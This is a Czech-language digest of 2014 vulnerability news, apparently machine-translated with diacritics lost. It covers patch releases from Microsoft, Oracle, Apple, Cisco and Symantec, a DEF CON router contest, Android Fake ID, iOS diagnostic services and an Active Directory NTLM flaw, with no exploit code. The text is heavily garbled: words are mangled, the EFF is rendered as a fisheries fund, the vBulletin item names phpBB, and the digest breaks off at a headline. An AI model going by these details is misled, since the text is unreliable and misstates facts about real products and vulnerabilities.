Aktualizace pila v patch oznmen na zatku msce pro upozornn uivatele, e Microsoft by za 18 msc, ji nepodporuj star verzi prohlee. S vyrka s nulovmi dn a vysokm profilem vyuije zamench na star verze IE, napklad 6, 7 a 8, Microsoft dal jasn najevo, e uivatel by mli pouvat pouze aktuln prohle s modern pam vyuvat sniujc zvanost rizika postavena v roce.

Microsoft tak oznmil, e bude blokovat star ovldac prvky ActiveX v aplikaci Internet Explorer , ponaje prol verz Javy, dal platformy siln zamen hackery.

Dal plnovan Patch Tuesday bulletin zabezpeen vydn je stanoven na 9 z.

Apple Safari zplaty libovoln sputn kdu zranitelnost25.8.2014 ZranitelnostiApple vydal nov verze svho prohlee Safari - 6.1.6 a 7.0.6 - ve kterm pevn vcensobn problmy s pokozenm pamti v Webkit.

Ze sedmi rznch CVE-ID, pt chyb byly nalezeny v dom a dal dva byly pipsny na anonymn vzkumnk a tmu Google Chrome bezpenosti. Vytvoenm webov strnky se kodlivm kdem, mohl by tonk zpsobit, Sputn libovolnho kdu nebo odmtnut sluby (pokozen pamti a aplikace, havrie) v potai klienta. seznam souvisejcho CVE-ID:

CVE-2014-1384CVE-2014-1385CVE-2014-1386CVE-2014-1387CVE-2014-1388CVE-2014-1389CVE-2014-1390.

15 novch chyb vyuvan pi DEF CON router hackersk soute25.8.2014 ZranitelnostiBezpenostn vzkumnci, kte se podlej na SOHOpelessly Broken hackersk souti na letonm ronku DEF CON prokzaly 15 nedostatky, kter ovlivuj mnostv malch office / home office smrova.

Pod nezvisl hodnotitele bezpenosti a Evropskho rybskho fondu, sout se skldala ze dvou skladeb (a improvizovan navc na druhm). V prvn soutc byli vyzvni, aby prokzat dve neidentifikovan zabezpeen v bezdrtovch smrova off-the-shelf spotebitel a veejn provdt toky s vyuitm nich. Ve druh, a capture-the-flag stylu soute, soutc byli za kol pevzt 10 off-the-shelf SOHO routery, kalen, ale se znmmi zranitelnosti. Z deseti ASUS RT-AC66U, Belkin N900 DB, Netgear WNDR4700 Centria, TRENDnet TEW-812DRU, byly zcela ohroena, spolu s router Actiontec Electronics, kter se obvykle vydvaj zkaznkm Verizon Communications ", a kter byl pedloen jeden z tchto soutcch. Linksys EA6500, Netgear WNR3500U / WNR3500L, TP-LINK TL-WR1043ND D-Link DIR-865L a EFF je Otevete okno nstroje Wireless Router Firmware byl jeden nespn zatoil, nebo nebyla napadena vbec. zero-day zranitelnost tra vidl tyi soutc, kter prokazuj, 15 zranitelnost, jedenct z nich bylo hlen Tripwire vzkumnk Craig Young, kter dve pracoval na testovn populrnch bezdrtovch smrova a zjistil, e 80% z amazonskch top 25 nejprodvanjch SOHO modely bezdrtovch smrova sportovn chyby zabezpeen. Pedchoz vzkum nezvislch bezpenostnch Hodnotitel tak zjistil , e mnoho smrova od rznch a populrnch vrobc maj jednu nebo vce kritick chyby zabezpeen, kter umouj mstn a vzdlen tonky . pevzt kontrolu nad zazenm a pout jej k fzi tok Podle Lucian Constantin , pouze tyi z hlench zranitelnost byly vlastn nov - zbytek byly dve objeveny, a oprava ze strany vrobce, ale pouze na jinch modelech router. To je pesn to, Tento bezstarostn postoj dodavatel a vrobc, e sout zamen zit svtlo na. Svou roli tak doufm, e tyto vsledky budou podnt uivatele a technology, aby nalhala na vrobce, aby zvily svou hru.

Microsoft opravuje 37 zranitelnost25.8.2014 ZranitelnostiMicrosoft chce zjevn vichni setst ps dny lta a vnovat pozornost zplatovn. Pedbn oznmen tento msc obsahuje devt nvst pokrvajcch spektrum produkt MSFT. Mme vudyptomn Internet Explorer vechny podporovan verze patche (MS14-051), se stejnm pravdpodobn upozornnm, e by to platit pro systm Windows XP tak, pokud spolenost Microsoft nadle podporuje ji. Tato oprava e jedinm zranitelnost bt aktivn vyuvn v prod od v tomto msci sklizn otzek, CVE-2014-2817 a jedin problm, kter je znmo, e bt zveejnny, ale nen znmo, e by v rmci aktivnho vyuvn, CVE-2014 -2819. Oba z nich jsou zven otzek vsad. MS14-043 je tak kritick a dlkov problm sputn kdu. To se tk pouze Professional / konen / Enterprise systmu Windows 7 a 8 / 8,1 a "Media Center TV Pack" pro Windows Vista. Natst, nebo ne, zle na hlu pohledu, to nen pravda, vzdlen, ale jet spe k dalmu toku, kde mus bt uivatel nucen k oteven kodlivho souboru. Tak poznmky, MS SQL Server, vechny podporovan verze jsou nchyln k problm, kter je Denial of Service na vtin platforem, ale je dleit, zven rovn oprvnn problmu na serveru 2014 a 2012 x64, je to pravdpodobn nen rozhodujc, protoe to bude vyadovat urit stupe ovovn vyuvat, ale vzhledem k potencilu, kter se stane v libovolnm potu okolnost, to bude nepochybn dleitou otzkou pro administrtory een. Krom tch, kter maj pestrou smsici 3 dalch EOPs, vzdlen sputn kdu a dv otzky bezpenostn spojka, vechny oznaen Dleit. Windows, Office, Sharepoint a NET jsou dotk tchto oprav. Bezpenost a IT tmy budou mt co dlat mchat testovat a aplikovat tyto opravy. Autor: Ross Barrett, Senior Manager, bezpenostn inenrstv, Rapid7.

Disqus WordPress plugin zranitelnosti25.8.2014 ZranitelnostiBhem penetranho testovn pro klienta, Australan zaloil nezvisl bezpenostn konzultant Nik Cubrilovic, objevili nkolik bezpenostnch otzkch v rmci velmi populrn Disqus WordPress plugin. Zatm plugin byl staen tm 1,5 milionu asy z oficiln Wordpress plugin loit.

Prvnm problmem je cross-site dost padln v souboru Manage.php. Cubrilovic konstatuje, e parametry disqus_replace, disqus_public_key a disqus_secret_key jsou pedny funkci update_option WordPress pmo bez filtrace. Zneuit tto chyby zabezpeen vyaduje tvorb kodlivch strnek a sociln inenrstv sprvce na nj kliknte. Druh chyba je trochu mn zvan. Kvli chybn kontroly, dost cross-site padln me bt pouita ke sputn obnoven nebo odstrann funkc koment systmu Disqus. To by mohlo mt za nsledek smazanch koment. Posledn otzkou souvis s parametrem kroku, kter je uloen jako nefiltrovan, a mohou bt pouity v cross site scripting toku. Tyto chyby byly zplatovan v nejnovj verzi Disqus - 2.7.6 proputn na 24.ervna. Protoe jeho zjevnou odpovdn politiky zpstupovn informac, pan Cubrilovic prv vydala podrobnosti te dlat dost jist as, kter uplynul od doby vydn pevn Disqus Wordpress plugin. Autor: Berislav Kucan, provozn editel Help Net Security.

Symantec problmy aktualizace upevnn Endpoint Protection zero-day14.8.2014 ZranitelnostiSpolenost Symantec vydala aktualizace pro jeho een Endpoint Protection pro pipevnn zero-day eskalaci oprvnn zranitelnosti nedvno objeven vzkumnky Offensive Security. "Problm, jak je uvedeno, vliv na aplikace a zazen Ovldac prvek aplikace Symantec Endpoint Protection. Tuto chybu zabezpeen nen pstupn na dlku a m vliv pouze na klienty z skuten bc aplikace a ovldac zazen, "spolenost je vysvtleno v aktualizace poradenstv . "Pokud zranitelnost je vyuvna pstupu k potai pmo, mohlo by to mt za nsledek havrii klienta, odepen sluby, nebo v ppad spchu , eskalovat na oprvnn sprvce a zskat kontrolu nad potaem, "kaj, a poznamenal, e si nejsou vdomi ppad zneuit tto chyby zabezpeen. Rovn poznamenal, e chybu nelze zneut vzdlen, ale Offensive Security zveejnny kd zneuit, nebezpe je velmi reln. zranitelnost postihuje vechny verze klient Symantec Endpoint Protection 11.x a 12.x bc aplikace a ovldac zazen, a uivatel se doporuuje provst aktualizaci na 12.1 RU4 MP1b. Aplikace Symantec Endpoint Protection Small Business Edition 12.0 je tak ovlivnna, a uivatel mohou odstranit nebezpe aktualizac na nejnovj dostupn sestaven z 12,1 Small Business Edition, kter nen dotena. Dal podrobnosti o bezpenostn slabosti, stejn jako sniujc zvanost rizika (v ppad, e aktualizace nelze aplikovat okamit) naleznete zde . Symantec oekv se, e een nalezen v jeho een Endpoint Protection vas ostatn nulov dny. Offensive Security sdl informace o nkterch zjitnch zranitelnost s CERT, ale jin byli studoval v Advanced Windows vykoisovn (AWE) samozejm spolenosti na Black Hat 2014 konferenci tento tden.

Exploit je k dispozici pro aplikaci Symantec End Point ochran

7.8.2014 Zranitelnosti

Vyuit nen k dispozici na exploit db.com pro Symantec End Point ochrany eskalaci prv zranitelnosti. Symantec vydala opravu tohoto problmu na zatku tohoto tdne. [1]

Tato chyba zabezpeen vyaduje pstup normln uivatele do postienho systmu a lze jej pout k zven oprvnn pln ovldat systm (namsto omezen na konkrtnho uivatele), take to bude velk navazuje vyut standardn drive-by zneut zsk uivatelsk prva.

Zskali jsme nkolik zprv, e uivatel maj pote s instalac nplast na starch systmech (napklad Windows 2003). Aplikace nplasti jen sele v tchto ppadech, a zd se, e nem negativn vliv na stabilitu systmu.

[1] http://www.symantec.com/business/support/index?page=content&id=TECH223338

Bezpenostn experti zjistili, e antiviry jsou drav jak eeto

3.3.2014 ZranitelnostiNa bezpenostn konferenci SyScan 360, v rmci kter jsme informovali napklad o stenm hacknut elektromobilu Tesla Model S, se objevila i podrobn pednka bezpenostnho experta Joxean Koretze spolenosti Coseinc.

Jak si mete prohldnout v podrobn pednce, clem vzkumu bylo zjistit rizika samotnch antivirovch program, kter sice maj slouit ke zven bezpenosti, ale samo o sob jsou znanou potenciln drou do systmu.

Jak Koretze upozornil, kad program, kter do operanho systmu nainstalujeme, zvyuje riziko kvli tomu, e poskytuje zase dal prostor, kter me ppadn tonk a malware vyut. V ppad antivir je situace o to nebezpenj, protoe maj k dispozici vy i nejvy prva, bez kterch by na druhou stranu zase nemohly vykonvat innost v podob skenovn, prav nebo mazn soubor.V rmci vzkumu se podailo nalzt zneuiteln chyby v antivirech od spolenost jako Avast, Bitdefender, Avira, AVG, Comodo, ClamAV, DrWeb, ESET, F-Prot, F-Secure, Panda nebo eScan. Celkem se podailo nalzt chyby v piblin 17 rznch antivirech. A dle vyjden se nelze niemu divit. Tyto programy p lid stejn jako jakkoli jin software a chybm se tak nelze nikdy zcela vyhnout. Vtina antivir napklad pouv pro aktualizaci nezabezpeen spojen HTTP, co umouje ppadnmu tonkovu vyut techniku Man in the middle a zskat tak pomoc antiviru pstup k celmu potai.

Nalezen chyby u napklad spolenosti Avast nebo Eset opravily, v ppad ostatnch to zatm nen potvrzen. Jak prozradil f AV-Test, kter se zabv testovnm antivir, osobn nevid pli velk problm s chybami v antivirech a spolh na statistiku. Pro ppadnho tonku je vdy vhodnj vyut chyby v rozench aplikacch jako je Java, Adobe Reader/Flash a podobn, kter se nachz takka na kadm potai. Antivirovch een je velk mnostv a potenciln trh v rmci jednoho typu tak nen pli lkav.

All Samba 4.x.x are vulnerable to a remote code execution vulnerability in the nmbd NetBIOS name services daemon

2.8.2014 Zranitelnosti

A remote code execution in nmbd (the NetBIOS name services daemon) has been found in Samba versions 4.0.0 to 4.1.10. ( assgined CVE-2014-3560) and a patch has been release by the team at samba.org.

Here's the details from http://www.samba.org/samba/security/CVE-2014-3560

===========Description===========

All current versions of Samba 4.x.x are vulnerable to a remote code execution vulnerability in the nmbd NetBIOS name services daemon.

A malicious browser can send packets that may overwrite the heap ofthe target nmbd NetBIOS name services daemon. It may be possible to use this to generate a remote code execution vulnerability as the superuser (root).

==================Patch Availability==================

A patch addressing this defect has been posted to

http://www.samba.org/samba/security/

Additionally, Samba 4.1.11 and 4.0.21 have been issued as security releases to correct the defect. Patches against older Samba versions are available at http://samba.org/samba/patches/. Samba vendors and administrators running affected versions are advised to upgrade or apply the patch as soon as possible.

==========Workaround==========

Do not run nmbd, the NetBIOS name services daemon.

40% z orgs systmem VMware stle nchyln k Heartbleed2.8.2014 ZranitelnostiUplynulo vce ne ti msce od objevu OpenSSL Heartbleed chyby , a mnoho systmy jsou stle zraniteln.

Podle daj shromdnch analytickch daj firmy CloudPhysics, vce ne polovina nasazench VMware vCenter server (57%) a ESXi hypervisor pota (58%) postiench vady jsou stle unpatched. VMware odvedl dobrou prci tla ven aktualizac zabezpeen pro sv vrobky (vetn ve uvedench), e fixn zranitelnost ve dvou tdnech po objeven, take problm zde jsou sprvci virtulnch datovch center. "I spekulovat, e IT tmy jsou laxn o zplatovn ESXi, protoe tyto stroje jsou obvykle za firewall a nen snadn se dostat z vnjho svta, " poznamenal Irfan Ahmad, spoluzakladatel a CTO v CloudPhysics. "Nicmn, e laxnost neznamen, e zpodn v zplatovn dobr npad. Za prv, zasvcench toky nadle hlavnm zdrojem poruovn. Dalm aspektem je, e pokud nebudou tonci poda infiltrovat malou oprvnn sluby uvnit brny firewall, jste prv jim dal volnou ruku k toku na vae nejcitlivj data. " Vichni ve vech, jejich data k, e vysok 40 procent organizac ve sv celosvtov uivatelsk zkladny maj alespo jednu vCenter server nebo ESXi hostitele, kter je stle zraniteln. "Mnoz bezpenostn experti pedpovdali, e by to mohlo trvat msce a roky, aby konen zbavit Heartbleed. Bohuel, alespo pro VMware infrastruktury, to se zd bt pravda, "k, jako rychlost zplatovn je neustle zpomaluje.

Internet Explorer zranitelnosti zvyuje na 100%2.8.2014 Zranitelnosti

Brmu Labs analyzovny veejn zranitelnosti a vyuije z prvnch esti mscch roku 2014. Vzkumu zjistila, e zranitelnost Internet Explorer zvil vce ne 100 procent od roku 2013, pekonal Java a Flash zranitelnosti.

Vdci zjist, e: Hackei stle vce zamuj Internet Explorer - Analza ukazuje, e zranitelnost Microsoft Internet Explorer se zvily vce ne 100 procent od roku 2013, trend podtrhlo postupn krat dobu do prvnho patche pro jeho poslednch dvou vydnch. Veejn JAVA nulovmi dny padku - V roce 2013, Java vedl mezi zranitelnost a veejn vyuije, ale tento trend se obrtil v roce 2014 ve skutenosti, v prvnch esti mscch roku 2014, tam nebyl jedin veejn JAVA vyut.. Action Script Spray d zero-day toky - Oba Internet Explorer a Flash zero-day toky zadluuje Action Script spreje, rodc techniku, kter obchz adresu rozloen prostoru randomizace (ASLR) s programem zptnho orientovan (ROP) etzce. "Koncov uivatel i nadle prvoadm kolem pro zabezpeen informac profesionly, protoe jsou nejvce clen a nejvce nchyln k tokm "ekl Rahul Kashyap, hlavn bezpenostn architekt, brmu. "Webov prohlee byly vdy oblbenou alej toku, ale nyn vidme, e hackei jsou nejen stle lep v toku Internet Explorer, dlaj to astji." pln zprva je k dispozici zde.

Apple potvrzuje iOS zadn vrtka, vzkumnk k, e vysvtlen je zavdjc2.8.2014 ZranitelnostiV nvaznosti na zjitn neleglnch funkc v iOS spolenosti Apple, kter mohou slouit jako zadn vrtka, spolenost zmnila v lnku znalostn bze vyjmenovat a vysvtlit ti sporn sluby nalezen iOS forenzn expert Jonathan Zdziarski.

Pcapd nstroj, to je vysvtleno, "podporuje diagnostick zachycen paket ze zazen se systmem iOS na dvryhodn potae," a je pouvn pro "een problm a diagnostiku problm s aplikac na zazen, stejn jako pipojen k podnikov VPN." file_relay sluba je tak pouv pro diagnostiku a Apple strojrenstv kvalifikovat konfigurace zkaznk. "Tato sluba je oddlen od uivatelskch generovan zlohy, nem pstup ke vem datm v pstroji, a respektuje iOS ochranu dat," tvrd. Konen, house_arrest "se pouv iTunes pro penos dokument do az pstroje se systmem iOS pro aplikace, kter podporuj tuto funkci, "stejn jako pi vvoji aplikace pro penos daj ze zkouek. Zdziarski komentoval na to tm, e je problm s pcapd je, e lze aktivovat na libovolnm zazen bezdrtov, bez vdom uivatele nebo povolen, a me, proto bt pouit pro snooping tetmi osobami v privilegovan postaven. "Apple je, e je zcela zavdjc tm, e prohls, e soubor rel je pouze pro koprovn diagnostickch dat. Pokud by diagnostickch dat, mte na mysli kompletn album uivatele, jejich SMS, poznmky , Address Book, Geolocation dat, screenshoty posledn vc, kterou se pi pohledu na, a tuny dalch osobnch daj - tak urit ... ale tato data je pli osobn povahy, kter maj bt nkdy potebn pro diagnostiku, "dodal. tak on poukzal na to, e znovu, uivatel nikdy podal o povolen k vpisu vech tchto daj, nebo oznmeny v dnm ppad. Slubu je mon pout bezdrtov, a to tak nerespektuje zlon ifrovn danho zazen, k. k se, e ano, iTunes a Xcode pout house_arrest slubu, ale to me bt tak pouit pro pstup k citliv informace app, vetn soukromho rozhovory a OAuth etony. "To nen zadn dvee, spe privilegovan pstup, kter je k dispozici zde, e opravdu nen nutn, aby se tam (nebo alespo by mohl bt navren jinak)," podotkl. Ujistil se, poznamenat, e on nem nrok e tato zadn vrtka byly tam dal mysln na pkaz NSA nebo jinch orgn. "Co dl starost m je, e Apple se zd bt zcela zavdjc o nkterch z nich (zejmna soubor rel), a ne eit problmy jsem vznesen na ostatn, "poznamenal a dodal, e douf, e spolenost bude tie opravit mnoh z nich v budoucch verzch mobilnho operanho systmu. "Bylo by nezodpovdn divoce na Apple, aby een tchto otzek, a to zejmna nyn, e veejnost v o nich," dodal.

Symantec Endpoint Protection Privilege eskalace Zero Day31.7.2014 Zranitelnosti

Lid na Offensive Security oznmila, e v prbhu testu penetrace pro jednoho ze svch zkaznk, oni nali nkolik chyb zabezpeen v aplikaci Symantec Endpoint Protection produktu. I kdy daje jsou omezen, je zranitelnost jev umonit zven rovn oprvnn pro uivatele systmu, kter by poskytl prakticky neomezen pstup k systmu. Offensive Security zveejnil video ukazujc vyuit jednoho z zranitelnosti .

Symantec uvedl, e jsou si vdomi zranitelnosti a vyetovn.

Tam je njak ironie v tom, e existuje Zero Day zranitelnosti v softwaru, kter velk st uivatel potat chrnit svj pota ped kodlivm softwarem a softwarov zranitelnosti. Faktem je, e vvoj software je tk, a dokonce i bezpenostn software nen imunn vi vyuitelnch zranitelnost. Pokud je jasn strana, zd se, e tam nejsou dn vyuije v prod a pesto, e je zapoteb lokln pstup k zazen, aby tyto chyby zabezpeen zneut.

Android nkolik let obsahuje zvanou zranitelnost

31.7.2014 ZranitelnostiVtina zazen s operanm systmem Google Android je nchyln k prniku do systmu, dky ktermu se tonci mohou dostat k platebn historii, e-mailm a dalm citlivm datm.

Tato nebezpen chyba je v Androidu podle expert ze spolenosti Bluebox Security ptomna ji od vydn verze 2.1 na potku roku 2010. Analytici j pezdvaj Fake ID, jeliko, podobn jako teba falen obansk prkaz napomh mladistvm pi koupi alkoholu, toto slab msto umouje nebezpenm aplikacm pstup ke specilnm funkcm Androidu, je jsou normln zapovzeny. Vvoji z Googlu v uplynulch letech pedstavili zmny, kter omezuj nkter z monch kod, je mohou tyto nebezpen aplikace napchat. Klov zranitelnost je v systmu vak stle (a to i v testovac verzi chystanho Android L).

Chyba Fake ID zneuv selhn Androidu pi ovovn platnosti kryptografickch certifikt, kter doprovzej kadou aplikaci nainstalovanou v zazen. Operan systm se spolh na daje pi rozdlovn specilnch oprvnn, kter umouj nkolika aplikacm fungovat mimo sandbox Androidu. Za normlnch okolnost sandbox zamezuje aplikacm, aby pistupovaly k datm, je pat jinm aplikacm, nebo k citlivm stem systmu. Vybran aplikace typu Adobe Flash i Google Wallet vak mohou fungovat i mimo sandbox. Podle Jeffa Forristala z Bluebox Security selhv Android pi ovovn etzce certifikt, kter se vyuvaj k oven toho, zda aplikace pat mezi privilegovan aplikace s rozenmi prvy.

V dsledku toho me kodliv aplikace obsahovat neplatn certifikt, kter bude tvrdit, e jde napklad o Flash, a Android j piad ta sam speciln privilegia, jak by piadil legitimn aplikaci legitimitu certifiktu OS jednodue nezkoum. Pak u jen sta, aby se koncov uivatel rozhodl nainstalovat falenou aplikaci, a je prakticky konec hry, upozoruje Forristal. Trojsk k ihned pronikne ze sandboxu a zane krst osobn data.

Zmny v Androidu 4.4 omezuj nkter privilegia, kter Android Flashi pidluje. I tak vak podle Forristala selhn pi oven etzce certifikt je v Androidu od verze 2.1. Po proven cel vci jsme rychle svm partnerm distribuovali opravu a provili jsme vechny aplikace v Google Play a nemme dn dkazy o tom, e by zneuvn tto zranitelnosti aktivn probhalo, uvedl mluv Googlu v reakci na naen experty z Bluebox Security. Zatm vak nen jasn, jakm zpsobem Google svou nkolik let starou chybu opravil i zda jeho partnei ji aktualizaci distribuuj koncovm uivatelm.

Unpatched OpenSSL otvory nalezen na Siemens IKS29.7.2014 ZranitelnostiPoet Siemens prmyslovch vrobk bylo zjitno, sportovn tyi zranitelnosti v jejich provdn OpenSSL, kter by mohly vst k man-in-the-middle (MITM) toky nebo padn webovch server vrobk.

Nedostatky lze zneut vzdlen, a vyuije kter se zamuj na tyto chyby OpenSSL jsou veejn dostupn, US Industrial Control Systems Cyber Emergency Response Team (ISC CERT) varoval ve tvrtek. Ze esti dotench produkt , aktualizace zabezpeen pro zplatovn dr jsou k dispozici pouze pro dv osoby. Do dal tyi obdr opravu, spolenost vydala seznam akc, zkaznci mohou zav ke snen rizika tok. "Postien Siemens prmyslov vrobky jsou ureny pro zen a kontrolu st a monitorovn v odvtv kritick infrastruktury, jako jsou chemick , Critical Vroba, energie, potraviny a zemdlstv, a vody a odpadn vody, "ISC CERT poznamenal. "Chyby zjitn mohl pravost, integritu a dostupnost dotench pstroj ovlivnit." "Dopad na jednotliv organizace je zvisl na mnoha faktorech, kter jsou jedinen pro kadou organizaci," oni si vimli, a dodal, e vlastnci aktiv mohou navc ochrnit sv systmy proti obecn kybernetick bezpenosti rizika podle - pokud je to mon - ujistte se, e nejsou pstupn z Internetu; tm, e systmy behing firewally a jejich izolace od podnikov st; a za pouit bezpench metod pro pstup k nim vzdlen.

Cisco opravuje kritickou chybu ve modemy a bezdrtov brny26.7.2014 Zranitelnosti

Cisco m pevnou kritickou zranitelnost postihujc adu svch bezdrtovch bytovch bran a kabelovch modem, a zkontrolovat, zda jsou jejich poskytovatel slueb a organizac na podporu tetch stran tlaili ven upgrade software pomoc opravy. Nabd uivatele Zkaznci bez smlouvy o poskytovn slueb by mly poadovat, bezplatn aktualizace prostednictvm technick pomoci Center Cisco (kontaktn informace naleznete zde ). zranitelnost, kter byla ocenna nejvy skre zvanosti, i kdy neexistuje dkaz, e se v souasn dob pouvaj v tocch, "by mohla umonit neovenmu vzdlenmu tonkovi vyut peteen vyrovnvac pamti a zpsobit sputn libovolnho kdu. " "zranitelnost je dsledkem nesprvnho oven vstupu pro HTTP poadavk," vysvtlil Cisco v poradenstv zveejnn ve stedu. "tonk by mohl tuto chybu zabezpeen zneut odeslnm poadavku vytvoenho HTTP ovlivnna zazen. spn vyuvn by mohlo tonkovi pd webov server a spustit libovoln kd se zvenmi oprvnnmi. . Tato chyba zabezpeen existuje, zda je zazen nakonfigurovno v reimu Router nebo v reimu brny " . Neexistuje dn een pro vady - aktualizace softwaru je jedin zpsob, jak odstranit riziko, e zranitelnost pzuje Doten produkty jsou:

Cisco DPC3212 VoIP kabelov modemCisco DPC3825 8x4 DOCSIS 3.0 Wireless Rezidenn brnaCisco EPC3212 VoIP kabelov modemCisco EPC3825 8x4 DOCSIS 3.0 Wireless Rezidenn brnaCisco Model DPC3010 DOCSIS 3.0 8x4 kabel modemuCisco Model DPC3925 8x4 DOCSIS 3.0 s bezdrtovm rezidenn brny s EdvaCisco Model DPQ3925 8x4 DOCSIS 3.0 Bezdrtov domc brna s EdvaCisco Model EPC3010 DOCSIS 3.0 Cable ModemCisco Model EPC3925 8x4 DOCSIS 3.0 s bezdrtovm rezidenn brny s Edva.

vBulletin nchyln k SQL injection24.7.2014 Zranitelnosti

Rumunsk hacking komunita objevil a zodpovdn hleny kritickou zranitelnost vi vloen SQL nalezen v nejnovj verzi (5.1.2) oblbenho webovho forum software phpBB.

Chyba by mohla umonit tonkovi aplikovat pkaz SQL a dostat sv ruce na poven sprvce, kter by pak umonily jim pstup k administranm panelu, a proto k databzm obsahujcm informace citliv uivatele (e-mailov adresy, hesla, atd.). A pokud je povoleno oprvnn k zpisu, by mohly dokonce spustit kodliv kd. objev vady byla sdlena s vBulletin developer, kte ihned zaali pracovat na opravu. Podle Softpedia v Ionut Ilacu, hacking komunity - Rumunsk Security Team - nen zjem o zneuvn nebo prodej informac o zranitelnosti, i kdy by to mohlo pravdpodobn vydlat jim slun penze jako vBulletin pouvaj destky tisc rznch webovch strnkch. Zstupce skupiny bylo eeno, Ilacu, e spolenost promptn reagovaly na jejich heads-up, a e dal verze softwaru bude obsahovat opravu pro problm. Jakmile nov verze je venku, a byl proveden velk poet uivatel, bude skupina sdlet podrobnosti o zranitelnosti s veejnost.

Oracle poskytuje 113 aktualizac24.7.2014 Zranitelnostitvrtletn Critical Patch Aktualizace Oracle (CPU) nen nikdy men akce. V dubnu jsme vidli 104 bezpenostn otzky eit, v lednu to bylo 144. Tentokrt jsme se potkaj s 113 aktualizacemi. Tyto aktualizace pokrvaj cel portfolio softwaru Oracle, vetn JRE, Solaris, Oracle databze, MySQL, a etn webov a middleware produkt. co vynv, je opodn oprava Heartbleed v MySQL Enterprise Server, pichz pln 3 msce po Oracle pevn, e problm ve svch ostatnch produkt, a vysoce rizikovch zranitelnost stanovench v Oracle Database a JRE. je to trochu okujc vidt, e horn dv otzky (CVE-2013-3751 a CVE-2013 - 3774) je stanoven v Oracle Database 12 byly stanoveny ped rokem pro Oracle Database 11. To znamen, e Oracle docela pravdpodobn, vdl, e verze 12 byl zraniteln, kdy vydali ji v ervnu loskho roku a opustili sv zkaznky vystaveny za uplynul rok. Star skvrny v Oracle Fusion Middleware (spojen s CVE-2013 -1741 a dal) se zdaj bt jin zve. To je pravdpodobn, e Oracle s upstream opravy z otevenho prodejce source (Mozilla v tomto ppad) a perozdlovat je k jejich placen, postiench zkaznk, protoe znovu pout postienou soust. JRE skvrny zabvat 20 rznch problm s mnoha vysoce rizikovch zranitelnost v kadm nejnovjch podporovanch verz JRE, jak se oekvalo jedn o vyuiteln prostednictvm sandboxed aplikac a aplet Java Web Start. V nejhorm z nich by tonk mohl zcela kompromisn clov systmy tm, e pimje uivatele k nvtv kodliv webov strnky, nebo pli spolenho, je ohroena "normln" webov strnky, kter se podv kodliv obsah. Posledn vylepen na kontrolu, kdy prohle me bet Java pluginy ponkud zmrnil riziko pro ty uivatele, kte byli pro chov jejich JRE a do dnenho dne a vlastn vnovat pozornost varovn a kontroly. To znamen, e je to stle jet bude velk riziko, a budeme muset monitorovat spoluprci zveejnn vyuit kdu z rznch systm zveejovn informac. JRE opravy bude prioritou zplaty pro tm vechny domc a podnikov koncov uivatele. Otzky Oracle databze bude hlavnm tmatem pro sprvce podnikov databze. Autor: Ross Barrett, Senior Manager, bezpenostn inenrstv, Rapid7.

Dopady Active Directory vad 95% z Fortune 1000 spolenost23.7.2014 ZranitelnostiAorato identifikovali novou hrozivou chybu v rmci sluby Active Directory, kter umouje tonkm zmnit heslo obti, i pes souasnou bezpenosti a identity Ochrana proti krdei opaten. Se 95% z Fortune 1000 spolenost pouvajc Active Directory, potencil pro tento konkrtn zranitelnosti zpsobit pokozen a odcizen je vysok. Jakmile tonk vyuv tto sluby Active Directory chybu, pomoc novho hesla, tonk me vydvat za ob pro pstup k rznm podnikm sluby a obsah, kter vyaduj vslovn pouit poven obti, jako je Remote Desktop Protocol (RDP), pihlen a Outlook Web Access (OWA). Bohuel, i pes souasn bezpenostnch protokol, zaznamenny udlosti chybt zsadn daj o toku krdee identity. tonk me tuto innost vykonvat bez vdom protokoly udlost, co Siems log-based a Big Data Security Analytics k niemu proti tmto druhm pokroilch tok. vysok rovni anatomie toku tonk vyuv veejn dostupn bezplatn testovn penetrace nstroje (nap. WCE nebo Mimikatz), kter krade komponentu ovovn, jmenoval NTLM hash, ze zazen na zamstnance. NTLM hash je umstn ve vchozm nastaven na vech zazench, kter se pipojuj k podnikovm zdrojm. Vzhledem k tomu, soust ovovn je znmo, e riziko zabezpeen, kter vede ke identity toky krdee, pes notoricky znm Pass-the-hash (PTH) toku, se ochrany byly umstny aby se zabrnilo jejmu zneuit. Napklad, mnoho podnik se sna omezit pouit Active Directory je star - a pesto povolen protokol default-ovovn (tj. NTLM). V jinch situacch, podniky log a audit NTLM innost. tonk nut klienta k ovovn sluby Active Directory pomoc slab ifrovac protokol. V tto fzi, tonk pouv Directory chybu Active, kde ifrovac protokol opr o NTLM hash. Tato innost nen zaznamenna v systmu a tet strana pihls, dokonce i ty, kter se specificky pihlsit NTLM innost. Jako vsledek, dn vstrahy, nebo forenzn dat, nkdy naznauj, e tok se kon. tonk dokazuje jeho tzv. legitimn identitu Active Directory pomoc protokolu slab ovovn. V dsledku toho, e tonk je schopen overovat se do vyhrazench slueb a zmnit heslo obti. tonk vyuv zmnn heslo pln ukrst identitu obti a pstup ke vem podnikovm zdrojm obti. "Miliony podniky jsou slep dvovat Active Directory jako zklad k jejich celkov IT infrastruktury. neastn Pravdou je, e tato dvra je naivn ztracen, take drtivou vtinu z Fortune 500 podnik a zamstnanc nchylnch k poruen osobnch a firemnch dat, "ekl Tal Be'ery, VP Vzkum na Aorato. ". Do podniky na vdom inherentn rizika spojen s spolhaj na Active Directory a vytvoit strategii pro zmrnn rizika, budeme i nadle vidt tonky chzi mimo cenn informace nepozorovan" Bez vlastn een s clem zmrnit tuto chybu, Aorato doporuuje podniky:

Detekce protokol ovovn anomlieIdentifikujte tok korelace bnmu pouit ifrovacch metod s kontextem, ve kterm se pouv identitu obtiUplatovat opaten ke snen toku. Vimnte si, e pouze tato opaten sniuj toku a neodstrauj to zcela nebo eit pinu.Pro vce technickch informac najdete zde .

Google jde do vlky proti nulov dn23.7.2014 Zranitelnosti

